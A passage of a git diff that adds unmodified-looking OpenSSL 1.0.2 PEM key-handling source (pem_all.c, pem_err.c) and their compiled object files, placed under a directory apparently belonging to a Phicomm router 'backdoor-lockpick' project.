+static DSA *pkey_get_dsa(EVP_PKEY *key, DSA **dsa);
+#endif
+
+#ifndef OPENSSL_NO_EC
+static EC_KEY *pkey_get_eckey(EVP_PKEY *key, EC_KEY **eckey);
+#endif
+
+IMPLEMENT_PEM_rw(X509_REQ, X509_REQ, PEM_STRING_X509_REQ, X509_REQ)
+
+IMPLEMENT_PEM_write(X509_REQ_NEW, X509_REQ, PEM_STRING_X509_REQ_OLD, X509_REQ)
+IMPLEMENT_PEM_rw(X509_CRL, X509_CRL, PEM_STRING_X509_CRL, X509_CRL)
+IMPLEMENT_PEM_rw(PKCS7, PKCS7, PEM_STRING_PKCS7, PKCS7)
+
+IMPLEMENT_PEM_rw(NETSCAPE_CERT_SEQUENCE, NETSCAPE_CERT_SEQUENCE,
+                 PEM_STRING_X509, NETSCAPE_CERT_SEQUENCE)
+#ifndef OPENSSL_NO_RSA
+/*
+ * We treat RSA or DSA private keys as a special case. For private keys we
+ * read in an EVP_PKEY structure with PEM_read_bio_PrivateKey() and extract
+ * the relevant private key: this means can handle "traditional" and PKCS#8
+ * formats transparently.
+ */
+static RSA *pkey_get_rsa(EVP_PKEY *key, RSA **rsa)
+{
+    RSA *rtmp;
+    if (!key)
+        return NULL;
+    rtmp = EVP_PKEY_get1_RSA(key);
+    EVP_PKEY_free(key);
+    if (!rtmp)
+        return NULL;
+    if (rsa) {
+        RSA_free(*rsa);
+        *rsa = rtmp;
+    }
+    return rtmp;
+}
+
+RSA *PEM_read_bio_RSAPrivateKey(BIO *bp, RSA **rsa, pem_password_cb *cb,
+                                void *u)
+{
+    EVP_PKEY *pktmp;
+    pktmp = PEM_read_bio_PrivateKey(bp, NULL, cb, u);
+    return pkey_get_rsa(pktmp, rsa);
+}
+
+# ifndef OPENSSL_NO_FP_API
+
+RSA *PEM_read_RSAPrivateKey(FILE *fp, RSA **rsa, pem_password_cb *cb, void *u)
+{
+    EVP_PKEY *pktmp;
+    pktmp = PEM_read_PrivateKey(fp, NULL, cb, u);
+    return pkey_get_rsa(pktmp, rsa);
+}
+
+# endif
+
+# ifdef OPENSSL_FIPS
+
+int PEM_write_bio_RSAPrivateKey(BIO *bp, RSA *x, const EVP_CIPHER *enc,
+                                unsigned char *kstr, int klen,
+                                pem_password_cb *cb, void *u)
+{
+    if (FIPS_mode()) {
+        EVP_PKEY *k;
+        int ret;
+        k = EVP_PKEY_new();
+        if (!k)
+            return 0;
+        EVP_PKEY_set1_RSA(k, x);
+
+        ret = PEM_write_bio_PrivateKey(bp, k, enc, kstr, klen, cb, u);
+        EVP_PKEY_free(k);
+        return ret;
+    } else
+        return PEM_ASN1_write_bio((i2d_of_void *)i2d_RSAPrivateKey,
+                                  PEM_STRING_RSA, bp, x, enc, kstr, klen, cb,
+                                  u);
+}
+
+#  ifndef OPENSSL_NO_FP_API
+int PEM_write_RSAPrivateKey(FILE *fp, RSA *x, const EVP_CIPHER *enc,
+                            unsigned char *kstr, int klen,
+                            pem_password_cb *cb, void *u)
+{
+    if (FIPS_mode()) {
+        EVP_PKEY *k;
+        int ret;
+        k = EVP_PKEY_new();
+        if (!k)
+            return 0;
+
+        EVP_PKEY_set1_RSA(k, x);
+
+        ret = PEM_write_PrivateKey(fp, k, enc, kstr, klen, cb, u);
+        EVP_PKEY_free(k);
+        return ret;
+    } else
+        return PEM_ASN1_write((i2d_of_void *)i2d_RSAPrivateKey,
+                              PEM_STRING_RSA, fp, x, enc, kstr, klen, cb, u);
+}
+#  endif
+
+# else
+
+IMPLEMENT_PEM_write_cb_const(RSAPrivateKey, RSA, PEM_STRING_RSA,
+                             RSAPrivateKey)
+# endif
+IMPLEMENT_PEM_rw_const(RSAPublicKey, RSA, PEM_STRING_RSA_PUBLIC,
+                       RSAPublicKey) IMPLEMENT_PEM_rw(RSA_PUBKEY, RSA,
+                                                      PEM_STRING_PUBLIC,
+                                                      RSA_PUBKEY)
+#endif
+#ifndef OPENSSL_NO_DSA
+static DSA *pkey_get_dsa(EVP_PKEY *key, DSA **dsa)
+{
+    DSA *dtmp;
+    if (!key)
+        return NULL;
+    dtmp = EVP_PKEY_get1_DSA(key);
+    EVP_PKEY_free(key);
+    if (!dtmp)
+        return NULL;
+    if (dsa) {
+        DSA_free(*dsa);
+        *dsa = dtmp;
+    }
+    return dtmp;
+}
+
+DSA *PEM_read_bio_DSAPrivateKey(BIO *bp, DSA **dsa, pem_password_cb *cb,
+                                void *u)
+{
+    EVP_PKEY *pktmp;
+    pktmp = PEM_read_bio_PrivateKey(bp, NULL, cb, u);
+    return pkey_get_dsa(pktmp, dsa); /* will free pktmp */
+}
+
+# ifdef OPENSSL_FIPS
+
+int PEM_write_bio_DSAPrivateKey(BIO *bp, DSA *x, const EVP_CIPHER *enc,
+                                unsigned char *kstr, int klen,
+                                pem_password_cb *cb, void *u)
+{
+    if (FIPS_mode()) {
+        EVP_PKEY *k;
+        int ret;
+        k = EVP_PKEY_new();
+        if (!k)
+            return 0;
+        EVP_PKEY_set1_DSA(k, x);
+
+        ret = PEM_write_bio_PrivateKey(bp, k, enc, kstr, klen, cb, u);
+        EVP_PKEY_free(k);
+        return ret;
+    } else
+        return PEM_ASN1_write_bio((i2d_of_void *)i2d_DSAPrivateKey,
+                                  PEM_STRING_DSA, bp, x, enc, kstr, klen, cb,
+                                  u);
+}
+
+#  ifndef OPENSSL_NO_FP_API
+int PEM_write_DSAPrivateKey(FILE *fp, DSA *x, const EVP_CIPHER *enc,
+                            unsigned char *kstr, int klen,
+                            pem_password_cb *cb, void *u)
+{
+    if (FIPS_mode()) {
+        EVP_PKEY *k;
+        int ret;
+        k = EVP_PKEY_new();
+        if (!k)
+            return 0;
+        EVP_PKEY_set1_DSA(k, x);
+        ret = PEM_write_PrivateKey(fp, k, enc, kstr, klen, cb, u);
+        EVP_PKEY_free(k);
+        return ret;
+    } else
+        return PEM_ASN1_write((i2d_of_void *)i2d_DSAPrivateKey,
+                              PEM_STRING_DSA, fp, x, enc, kstr, klen, cb, u);
+}
+#  endif
+
+# else
+
+IMPLEMENT_PEM_write_cb_const(DSAPrivateKey, DSA, PEM_STRING_DSA,
+                             DSAPrivateKey)
+# endif
+    IMPLEMENT_PEM_rw(DSA_PUBKEY, DSA, PEM_STRING_PUBLIC, DSA_PUBKEY)
+# ifndef OPENSSL_NO_FP_API
+DSA *PEM_read_DSAPrivateKey(FILE *fp, DSA **dsa, pem_password_cb *cb, void *u)
+{
+    EVP_PKEY *pktmp;
+    pktmp = PEM_read_PrivateKey(fp, NULL, cb, u);
+    return pkey_get_dsa(pktmp, dsa); /* will free pktmp */
+}
+
+# endif
+
+IMPLEMENT_PEM_rw_const(DSAparams, DSA, PEM_STRING_DSAPARAMS, DSAparams)
+#endif
+#ifndef OPENSSL_NO_EC
+static EC_KEY *pkey_get_eckey(EVP_PKEY *key, EC_KEY **eckey)
+{
+    EC_KEY *dtmp;
+    if (!key)
+        return NULL;
+    dtmp = EVP_PKEY_get1_EC_KEY(key);
+    EVP_PKEY_free(key);
+    if (!dtmp)
+        return NULL;
+    if (eckey) {
+        EC_KEY_free(*eckey);
+        *eckey = dtmp;
+    }
+    return dtmp;
+}
+
+EC_KEY *PEM_read_bio_ECPrivateKey(BIO *bp, EC_KEY **key, pem_password_cb *cb,
+                                  void *u)
+{
+    EVP_PKEY *pktmp;
+    pktmp = PEM_read_bio_PrivateKey(bp, NULL, cb, u);
+    return pkey_get_eckey(pktmp, key); /* will free pktmp */
+}
+
+IMPLEMENT_PEM_rw_const(ECPKParameters, EC_GROUP, PEM_STRING_ECPARAMETERS,
+                       ECPKParameters)
+# ifdef OPENSSL_FIPS
+int PEM_write_bio_ECPrivateKey(BIO *bp, EC_KEY *x, const EVP_CIPHER *enc,
+                               unsigned char *kstr, int klen,
+                               pem_password_cb *cb, void *u)
+{
+    if (FIPS_mode()) {
+        EVP_PKEY *k;
+        int ret;
+        k = EVP_PKEY_new();
+        if (!k)
+            return 0;
+        EVP_PKEY_set1_EC_KEY(k, x);
+
+        ret = PEM_write_bio_PrivateKey(bp, k, enc, kstr, klen, cb, u);
+        EVP_PKEY_free(k);
+        return ret;
+    } else
+        return PEM_ASN1_write_bio((i2d_of_void *)i2d_ECPrivateKey,
+                                  PEM_STRING_ECPRIVATEKEY,
+                                  bp, x, enc, kstr, klen, cb, u);
+}
+
+#  ifndef OPENSSL_NO_FP_API
+int PEM_write_ECPrivateKey(FILE *fp, EC_KEY *x, const EVP_CIPHER *enc,
+                           unsigned char *kstr, int klen,
+                           pem_password_cb *cb, void *u)
+{
+    if (FIPS_mode()) {
+        EVP_PKEY *k;
+        int ret;
+        k = EVP_PKEY_new();
+        if (!k)
+            return 0;
+        EVP_PKEY_set1_EC_KEY(k, x);
+        ret = PEM_write_PrivateKey(fp, k, enc, kstr, klen, cb, u);
+        EVP_PKEY_free(k);
+        return ret;
+    } else
+        return PEM_ASN1_write((i2d_of_void *)i2d_ECPrivateKey,
+                              PEM_STRING_ECPRIVATEKEY,
+                              fp, x, enc, kstr, klen, cb, u);
+}
+#  endif
+
+# else
+    IMPLEMENT_PEM_write_cb(ECPrivateKey, EC_KEY, PEM_STRING_ECPRIVATEKEY,
+                       ECPrivateKey)
+# endif
+IMPLEMENT_PEM_rw(EC_PUBKEY, EC_KEY, PEM_STRING_PUBLIC, EC_PUBKEY)
+# ifndef OPENSSL_NO_FP_API
+EC_KEY *PEM_read_ECPrivateKey(FILE *fp, EC_KEY **eckey, pem_password_cb *cb,
+                              void *u)
+{
+    EVP_PKEY *pktmp;
+    pktmp = PEM_read_PrivateKey(fp, NULL, cb, u);
+    return pkey_get_eckey(pktmp, eckey); /* will free pktmp */
+}
+
+# endif
+
+#endif
+
+#ifndef OPENSSL_NO_DH
+
+IMPLEMENT_PEM_write_const(DHparams, DH, PEM_STRING_DHPARAMS, DHparams)
+    IMPLEMENT_PEM_write_const(DHxparams, DH, PEM_STRING_DHXPARAMS, DHxparams)
+#endif
+IMPLEMENT_PEM_rw(PUBKEY, EVP_PKEY, PEM_STRING_PUBLIC, PUBKEY)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_all.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_all.o
new file mode 100644
index 0000000000000000000000000000000000000000..7a7cdae445e20260733e482ae9ce64184c98147a
GIT binary patch
literal 14288
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
UtX+h)f9cvni*HCnKHB;J4>eQo=l}o!

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_err.c
new file mode 100644
index 0000000..e1f4fdb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_err.c
@@ -0,0 +1,168 @@
+/* crypto/pem/pem_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2011 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/pem.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_PEM,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_PEM,0,reason)
+
+static ERR_STRING_DATA PEM_str_functs[] = {
+    {ERR_FUNC(PEM_F_B2I_DSS), "B2I_DSS"},
+    {ERR_FUNC(PEM_F_B2I_PVK_BIO), "b2i_PVK_bio"},
+    {ERR_FUNC(PEM_F_B2I_RSA), "B2I_RSA"},
+    {ERR_FUNC(PEM_F_CHECK_BITLEN_DSA), "CHECK_BITLEN_DSA"},
+    {ERR_FUNC(PEM_F_CHECK_BITLEN_RSA), "CHECK_BITLEN_RSA"},
+    {ERR_FUNC(PEM_F_D2I_PKCS8PRIVATEKEY_BIO), "d2i_PKCS8PrivateKey_bio"},
+    {ERR_FUNC(PEM_F_D2I_PKCS8PRIVATEKEY_FP), "d2i_PKCS8PrivateKey_fp"},
+    {ERR_FUNC(PEM_F_DO_B2I), "DO_B2I"},
+    {ERR_FUNC(PEM_F_DO_B2I_BIO), "DO_B2I_BIO"},
+    {ERR_FUNC(PEM_F_DO_BLOB_HEADER), "DO_BLOB_HEADER"},
+    {ERR_FUNC(PEM_F_DO_PK8PKEY), "DO_PK8PKEY"},
+    {ERR_FUNC(PEM_F_DO_PK8PKEY_FP), "DO_PK8PKEY_FP"},
+    {ERR_FUNC(PEM_F_DO_PVK_BODY), "DO_PVK_BODY"},
+    {ERR_FUNC(PEM_F_DO_PVK_HEADER), "DO_PVK_HEADER"},
+    {ERR_FUNC(PEM_F_I2B_PVK), "I2B_PVK"},
+    {ERR_FUNC(PEM_F_I2B_PVK_BIO), "i2b_PVK_bio"},
+    {ERR_FUNC(PEM_F_LOAD_IV), "LOAD_IV"},
+    {ERR_FUNC(PEM_F_PEM_ASN1_READ), "PEM_ASN1_read"},
+    {ERR_FUNC(PEM_F_PEM_ASN1_READ_BIO), "PEM_ASN1_read_bio"},
+    {ERR_FUNC(PEM_F_PEM_ASN1_WRITE), "PEM_ASN1_write"},
+    {ERR_FUNC(PEM_F_PEM_ASN1_WRITE_BIO), "PEM_ASN1_write_bio"},
+    {ERR_FUNC(PEM_F_PEM_DEF_CALLBACK), "PEM_def_callback"},
+    {ERR_FUNC(PEM_F_PEM_DO_HEADER), "PEM_do_header"},
+    {ERR_FUNC(PEM_F_PEM_F_PEM_WRITE_PKCS8PRIVATEKEY),
+     "PEM_F_PEM_WRITE_PKCS8PRIVATEKEY"},
+    {ERR_FUNC(PEM_F_PEM_GET_EVP_CIPHER_INFO), "PEM_get_EVP_CIPHER_INFO"},
+    {ERR_FUNC(PEM_F_PEM_PK8PKEY), "PEM_PK8PKEY"},
+    {ERR_FUNC(PEM_F_PEM_READ), "PEM_read"},
+    {ERR_FUNC(PEM_F_PEM_READ_BIO), "PEM_read_bio"},
+    {ERR_FUNC(PEM_F_PEM_READ_BIO_DHPARAMS), "PEM_READ_BIO_DHPARAMS"},
+    {ERR_FUNC(PEM_F_PEM_READ_BIO_PARAMETERS), "PEM_read_bio_Parameters"},
+    {ERR_FUNC(PEM_F_PEM_READ_BIO_PRIVATEKEY), "PEM_READ_BIO_PRIVATEKEY"},
+    {ERR_FUNC(PEM_F_PEM_READ_DHPARAMS), "PEM_READ_DHPARAMS"},
+    {ERR_FUNC(PEM_F_PEM_READ_PRIVATEKEY), "PEM_READ_PRIVATEKEY"},
+    {ERR_FUNC(PEM_F_PEM_SEALFINAL), "PEM_SealFinal"},
+    {ERR_FUNC(PEM_F_PEM_SEALINIT), "PEM_SealInit"},
+    {ERR_FUNC(PEM_F_PEM_SIGNFINAL), "PEM_SignFinal"},
+    {ERR_FUNC(PEM_F_PEM_WRITE), "PEM_write"},
+    {ERR_FUNC(PEM_F_PEM_WRITE_BIO), "PEM_write_bio"},
+    {ERR_FUNC(PEM_F_PEM_WRITE_PRIVATEKEY), "PEM_WRITE_PRIVATEKEY"},
+    {ERR_FUNC(PEM_F_PEM_X509_INFO_READ), "PEM_X509_INFO_read"},
+    {ERR_FUNC(PEM_F_PEM_X509_INFO_READ_BIO), "PEM_X509_INFO_read_bio"},
+    {ERR_FUNC(PEM_F_PEM_X509_INFO_WRITE_BIO), "PEM_X509_INFO_write_bio"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA PEM_str_reasons[] = {
+    {ERR_REASON(PEM_R_BAD_BASE64_DECODE), "bad base64 decode"},
+    {ERR_REASON(PEM_R_BAD_DECRYPT), "bad decrypt"},
+    {ERR_REASON(PEM_R_BAD_END_LINE), "bad end line"},
+    {ERR_REASON(PEM_R_BAD_IV_CHARS), "bad iv chars"},
+    {ERR_REASON(PEM_R_BAD_MAGIC_NUMBER), "bad magic number"},
+    {ERR_REASON(PEM_R_BAD_PASSWORD_READ), "bad password read"},
+    {ERR_REASON(PEM_R_BAD_VERSION_NUMBER), "bad version number"},
+    {ERR_REASON(PEM_R_BIO_WRITE_FAILURE), "bio write failure"},
+    {ERR_REASON(PEM_R_CIPHER_IS_NULL), "cipher is null"},
+    {ERR_REASON(PEM_R_ERROR_CONVERTING_PRIVATE_KEY),
+     "error converting private key"},
+    {ERR_REASON(PEM_R_EXPECTING_PRIVATE_KEY_BLOB),
+     "expecting private key blob"},
+    {ERR_REASON(PEM_R_EXPECTING_PUBLIC_KEY_BLOB),
+     "expecting public key blob"},
+    {ERR_REASON(PEM_R_INCONSISTENT_HEADER), "inconsistent header"},
+    {ERR_REASON(PEM_R_KEYBLOB_HEADER_PARSE_ERROR),
+     "keyblob header parse error"},
+    {ERR_REASON(PEM_R_KEYBLOB_TOO_SHORT), "keyblob too short"},
+    {ERR_REASON(PEM_R_NOT_DEK_INFO), "not dek info"},
+    {ERR_REASON(PEM_R_NOT_ENCRYPTED), "not encrypted"},
+    {ERR_REASON(PEM_R_NOT_PROC_TYPE), "not proc type"},
+    {ERR_REASON(PEM_R_NO_START_LINE), "no start line"},
+    {ERR_REASON(PEM_R_PROBLEMS_GETTING_PASSWORD),
+     "problems getting password"},
+    {ERR_REASON(PEM_R_PUBLIC_KEY_NO_RSA), "public key no rsa"},
+    {ERR_REASON(PEM_R_PVK_DATA_TOO_SHORT), "pvk data too short"},
+    {ERR_REASON(PEM_R_PVK_TOO_SHORT), "pvk too short"},
+    {ERR_REASON(PEM_R_READ_KEY), "read key"},
+    {ERR_REASON(PEM_R_SHORT_HEADER), "short header"},
+    {ERR_REASON(PEM_R_UNSUPPORTED_CIPHER), "unsupported cipher"},
+    {ERR_REASON(PEM_R_UNSUPPORTED_ENCRYPTION), "unsupported encryption"},
+    {ERR_REASON(PEM_R_UNSUPPORTED_KEY_COMPONENTS),
+     "unsupported key components"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_PEM_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(PEM_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, PEM_str_functs);
+        ERR_load_strings(0, PEM_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_err.o
new file mode 100644
index 0000000000000000000000000000000000000000..315bb942a32e89fea4f60c2b94257d08d17ede33
GIT binary patch
literal 1360
zcmbtSOH0E*5S|zx^#MNcAXFrtRMe&Qf#^XBrFv13g5X6$TGuKzX-PI<J?LNXr}z^D
z|A0TkqvFkr&NRDmyH*4pn9R(#^UWi>x23(E9?JqH7Hq>;q)>pvo-e=9b_*~9!|*mb
